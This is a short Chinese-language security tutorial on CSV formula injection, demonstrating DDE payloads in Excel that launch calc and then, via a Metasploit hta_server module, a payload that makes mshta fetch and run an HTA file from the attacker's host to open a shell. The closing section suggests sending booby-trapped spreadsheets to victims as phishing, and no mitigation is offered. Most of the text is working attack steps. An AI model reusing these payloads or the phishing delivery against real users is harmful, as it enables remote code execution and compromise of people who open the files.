CSV注入之RCE&社工钓鱼

漏洞介绍

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量，攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷，当用户打开Excel文件时，文件会从CSV描述转变为原始的Excel格式，包括Excel提供的所有动态功能，在这个过程中，CSV中的所有Excel公式都会执行，当该函数有合法意图时，很易被滥用并允许恶意代码执行。

漏洞复现

简易测试

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能：

之后构造以下恶意载荷：

=1+cmd|' /C calc'!A0

之后模拟用户打开Excel文件：

发现载荷成功执行：

反弹Shell

这里使用MSF框架来实施攻击：

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.174.129
msf exploit(windows/misc/hta_server) > exploit

之后在Excel中插入恶意载荷

=1+cmd|' /C mshta.exe http://192.168.174.129:8888/Agd7QT.hta'!A0

保存之后发送给其他用户：

当用户打开时在MSF端成功上线：

文末小结

CSV注入时常出现在数据导出功能部分，例如：将当前表格数据导出到Excel，此时攻击者可以在当前表格中插入恶意代码，之后当用户导出当前表格数据并保存为Excel，再次打开Excel时便会导致恶意载荷执行，同时CSV注入也可以用于钓鱼，攻击者可以精心构造一个富含大量数据的Excel并插入恶意代码，诱导受害者用户访问并查看，从而触发恶意代码~